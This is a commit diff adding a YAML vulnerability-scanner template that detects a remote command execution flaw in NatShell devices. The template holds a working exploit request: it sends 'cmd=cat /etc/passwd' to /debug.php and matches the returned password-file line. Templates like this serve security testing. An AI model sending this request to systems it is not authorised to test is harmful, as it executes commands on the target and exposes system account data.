Create natshell-rce.yaml
parent
c9e2a3c535
commit
f1726d3a1f
|
@ -0,0 +1,27 @@
|
||||||
|
id: natshell-rcce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: NatShell Rce
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
reference: |
|
||||||
|
- https://twitter.com/sec715/status/1397924997457317897
|
||||||
|
tags: natshell,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/debug.php"
|
||||||
|
body: |
|
||||||
|
cmd=cat /etc/passwd
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "toor:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue